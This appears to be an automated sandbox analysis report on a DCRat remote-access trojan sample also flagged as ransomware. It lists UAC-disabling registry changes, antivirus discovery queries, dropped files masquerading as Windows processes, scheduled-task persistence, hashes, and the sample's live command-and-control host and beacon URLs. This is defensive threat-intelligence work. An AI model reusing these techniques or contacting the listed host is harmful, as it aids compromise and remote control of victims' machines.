Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Registry value created: PromptOnSecureDesktop 0

Jump to behavior

Disables UAC (registry)

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4184969594.000000001BCF7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: 00000027.00000002.1846749984.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1834388841.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1847341933.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1848071162.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1830308361.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730523212.0000000003043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730523212.000000000302A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1847247519.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730523212.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1834388841.000000000307D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1835126643.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1846749984.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1846857363.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1847247519.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735799473.0000000012EED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jmBb9uY1B8.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SgrmBroker.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SgrmBroker.exe PID: 7964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 7980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 7992, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: 00000027.00000002.1846749984.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1834388841.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1847341933.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1848071162.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1830308361.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730523212.0000000003043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730523212.000000000302A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1847247519.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730523212.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1834388841.000000000307D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1835126643.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1846749984.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1846857363.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1847247519.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735799473.0000000012EED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jmBb9uY1B8.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MwDxnowBVCiAiIllnkPs.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SgrmBroker.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SgrmBroker.exe PID: 7964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 7980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 7992, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	2 Windows Service	2 Windows Service	222 Masquerading	OS Credential Dumping	341 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	134 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bypass User Account Control	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jmBb9uY1B8.exe	76%	Virustotal		Browse
jmBb9uY1B8.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
jmBb9uY1B8.exe	100%	Avira	HEUR/AGEN.1323984
jmBb9uY1B8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\twain_32\SgrmBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe	100%	Avira	HEUR/AGEN.1323984
C:\ProgramData\sihost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Windows\twain_32\SgrmBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Joe Sandbox ML
C:\Recovery\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe	100%	Joe Sandbox ML
C:\ProgramData\sihost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\ProgramData\sihost.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\MwDxnowBVCiAiIllnkPs.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\RuntimeBroker.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\twain_32\SgrmBroker.exe	76%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus

Source	Detection	Scanner	Label
http://phoeni13.beget.tech/19bd75f9.php?b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8&152f328392d8768f56766d0288112f44=f6a1095ee603dfb2a6045076d6e72102&365174fb29f58fe307a28d17c1f20f9c=QYkJ2NxQjZjdjM3EzM2gzNiNDOxQzYlFTNzkDOmF2MhlTZ3ETMmZjY&b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8	0%	Avira URL Cloud	safe
http://phoeni13.beget.tech/19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&	0%	Avira URL Cloud	safe
http://phoeni13.beget.tech	0%	Avira URL Cloud	safe
http://phoeni13.beget.tech/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
phoeni13.beget.tech	5.101.152.15	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://phoeni13.beget.tech/19bd75f9.php?b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8&152f328392d8768f56766d0288112f44=f6a1095ee603dfb2a6045076d6e72102&365174fb29f58fe307a28d17c1f20f9c=QYkJ2NxQjZjdjM3EzM2gzNiNDOxQzYlFTNzkDOmF2MhlTZ3ETMmZjY&b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://phoeni13.beget.tech	MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	jmBb9uY1B8.exe, 00000000.00000002.1730523212.0000000003043000.00000004.00000800.00020000.00000000.sdmp, MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://phoeni13.beget.tech/19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&	MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://phoeni13.beget.tech/	MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.101.152.15	phoeni13.beget.tech	Russian Federation		198610	BEGET-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584524
Start date and time:	2025-01-05 18:56:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jmBb9uY1B8.exe renamed because original name is a hash value
Original Sample Name:	5d232371c6b04bf6e609ee14fc06f3f6.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@38/32@1/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): RuntimeBroker.exe, ShellExperienceHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MwDxnowBVCiAiIllnkPs.exe, PID 7744 because it is empty
Execution Graph export aborted for target MwDxnowBVCiAiIllnkPs.exe, PID 7804 because it is empty
Execution Graph export aborted for target MwDxnowBVCiAiIllnkPs.exe, PID 7820 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 7856 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 7872 because it is empty
Execution Graph export aborted for target SgrmBroker.exe, PID 7928 because it is empty
Execution Graph export aborted for target SgrmBroker.exe, PID 7964 because it is empty
Execution Graph export aborted for target jmBb9uY1B8.exe, PID 6784 because it is empty
Execution Graph export aborted for target sihost.exe, PID 7980 because it is empty
Execution Graph export aborted for target sihost.exe, PID 7992 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:57:03	API Interceptor	3444499x Sleep call for process: MwDxnowBVCiAiIllnkPs.exe modified
17:57:02	Task Scheduler	Run new task: MwDxnowBVCiAiIllnkPs path: "C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe"
17:57:02	Task Scheduler	Run new task: MwDxnowBVCiAiIllnkPsM path: "C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe"
17:57:02	Task Scheduler	Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
17:57:03	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
17:57:03	Task Scheduler	Run new task: SgrmBroker path: "C:\Windows\twain_32\SgrmBroker.exe"
17:57:03	Task Scheduler	Run new task: SgrmBrokerS path: "C:\Windows\twain_32\SgrmBroker.exe"
17:57:03	Task Scheduler	Run new task: sihost path: "C:\Users\All Users\sihost.exe"
17:57:03	Task Scheduler	Run new task: sihosts path: "C:\Users\All Users\sihost.exe"
17:57:03	Task Scheduler	Run new task: StartMenuExperienceHost path: "C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe"
17:57:03	Task Scheduler	Run new task: StartMenuExperienceHostS path: "C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5.101.152.15	oFAjWuoHBq.exe	Get hash	malicious	DCRat	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BEGET-ASRU	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	193.168.46.136
	oFAjWuoHBq.exe	Get hash	malicious	DCRat	Browse	5.101.152.15
	Setup.exe	Get hash	malicious	Vidar	Browse	45.130.41.93
	Setup.exe	Get hash	malicious	Vidar	Browse	45.130.41.93
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse	5.101.153.57
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	185.155.118.34
	splppc.elf	Get hash	malicious	Unknown	Browse	81.200.117.158
	arm5.elf	Get hash	malicious	Unknown	Browse	193.168.46.153
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	87.236.16.19
	GNUCXbYadp.exe	Get hash	malicious	DCRat	Browse	5.101.153.48

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with very long lines (949), with no line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	5.914293403626048
Encrypted:	false
SSDEEP:	24:Cumf8cUld2vIUKrhkyHj46tI3lBqf0niCV5v8xzhTqjA+ZHt:CQc6upcayHFq18UBU+ZN
MD5:	27BD844D4F448D48A7CAED15F862D10F
SHA1:	8C41D05746AA0C2639EAEC18E26960DD09FAE7E9
SHA-256:	2177ECB226AE09A67072FF617C51DBEAF845DDD585784EF4F4FD077FA5E4952D
SHA-512:	A329A99286859E93B3484854CEF162814CDE556AE3C290CD547CCE6841850E0ECF2DE64BF0F91C81BF1D4FD07D2E03F7A2DD96641DEEFBF7B0A8F6DD1C0610F8
Malicious:	false
Preview:	mCMlz4vsSocgKM22sNIOh4oM5TyGCsTDO7bAG4vXvEmsksiVakfC97ZrY9qgGpqjVYSNv1vxcvcdS6lMucpbMRDQitmGOORFYCWLaVkiysjOe6YbXdvnAPXEVBpBPpiNeXEPjZwZ1GmerywmUKsudnFIpS0YpjTJJWuH1I27qVv3m2WgPDqE6yt0S6kQjXuSwcUUEpuLSvEH1Lfw5UJm2ONVm3z5ilYSldGKhCbjSewLtl9GaxUONHZiP9sKzznrWvgYEVO32jUYcClA4seuQKEdDi5iTRuc1Ey8FlBEjbWoxBFMXrPHV3bMqCUgaqjlz1gXNn5TqaLzyaqCcsKmBmH8nmRCQfo31uy5er8uw6a4rmYPVRDrf7jMtiulV2CLvR7Dmuiuta0FMMQBOBq9c7Y3KlL57XY43PJaoUnltT7EHeAhStWTLDty3D2BimxWC6L7D0X3YFPI9TwqkonOAEs0fUgkclCHflCLTCdcWd4FxkyjRMa48jV7NVbsTwbxDImYRlWiKK1hKnC5g7SQLHI6PF78kvJjCHBp7aRqz2tyryxkSgMWdLm5AqJMnY7ZBSfClX8FpmaSXUPbSXpEjxF0fFoRQFCb5UwYSu85hGq0uTiqas4Ps2zOMohfsrzjj8XCh1IhZuhcGOGLh80iLxtCfhLoNdN0RHRw6fIjjWz8VXI8iV7t0QYwPUhApdU6gqL97UPC0R8y7urHYNG2fdABsegl7H3GC3boLJAOF53iRjyemalbXbaCqKQdxoFsY2wESD5PN2wkkbtIqB8hfbskcZ8B3haa0KKYxuMjeWOfo0cOaHwwphM6KLl3F3VpbVuZRVU5zZCJNN5l7tlvunvS8NOmISdkAiDSGC6Ew17QeDs6P96VSk5xkbbDHswg5cIoJmf5xg93qex4fRWJWISanPsok27EEaVC4DwmeBivlCHFohizV

C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\jDownloader\55b276f4edf653

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with very long lines (682), with no line terminators
Category:	dropped
Size (bytes):	682
Entropy (8bit):	5.90332574799271
Encrypted:	false
SSDEEP:	12:wTbhLnE6mQzneT/8RUULD9jaDgQlEr2oorNKpkqKS4xrSZ8j0PW1k:s1LHzeTkRU4D9ja8Ql79NKp3uxrSZyLq
MD5:	B09FE916FDF562AE9773A8002B5CC6E0
SHA1:	15A33867BFCB1B0B5724F9B2284E16B24996BF44
SHA-256:	4E71275B965A46F93B6B822489D533A4BFFD327E216CEA5C2B34DA7419EB77A0
SHA-512:	95116E9332A238D5FF8059CB51825F7ED4A85C764EC9386E81C71E62846F659FE9FC18775DDFC3E9D940FA54DC83C511A82488FEF284BA69A68172675E58FE3E
Malicious:	false
Preview:	hUvduJkBYyU3ythHv0OQx62mXHfyUp1nzjpuhXlEw4GgNDgwZJac872lcJFnnvrs6qEPDwjYPKe3zVZTltZLOZp1rDRYS8aAMXjh9RsnjCNyd8wGuvB3WgehAMiAeLGQtdrbw1UUBwlMM1YsRKog6gnq3BgwssIY56E9RVU2br2k4SVJxztUgjTM0AhuUhlSnMQPxZb50vFPoDvlqX839y1Wm1JQxjh3Fj6rBFVYYxdueEiwP6E6jsTzV4m5QLIQNLJEGDjkBkfMUH1iTWA0flUXQHWHcaINoMgS4epMWd58NHeNCEm3KSvm1wx9qcIlcRhIkjozqydBqVKImJEYyOCWb4aHqqg3VTg5jWndZwMWyt6fmoWhYtwNPLqqIhJARjqWyOjQfl8BBqir74fBU8flhTqYp6V2nMEODkrXFGBxuuLjm9tNBHpSEFzfiKkjPGYylUoWNH5N7s0wHGvpNH0fhvJ8vLy5fchoWX7SVW94McVVODYbY4VHP2R0KqlCS9sfKLZuJcU1I6TEaxtsxXgkGZZeFGIpu7lMtzKCnnS5kd9SiMZW63O5cHYvw4oCTpHLUHVknqEJElAmaG63qws0sqtmaZQt9Pm5Wy8b1ztPzF01GwVp8vVh6QcnXsKNaVKz9FQlIeB1DdBnz1foEluN3E9FVUDIofze5A2Bft

C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe

Download File

